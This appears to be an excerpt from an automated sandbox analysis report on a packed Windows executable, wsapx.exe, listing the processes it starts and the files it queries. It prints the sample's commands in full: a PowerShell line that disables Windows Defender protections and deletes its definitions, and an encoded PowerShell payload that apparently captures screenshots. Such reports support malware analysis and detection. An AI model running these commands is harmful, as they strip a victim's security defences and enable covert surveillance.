              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E60B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,110_2_00007FF60E60B340
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D95E0 cpuid 0_2_00007FF7C71D95E0
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
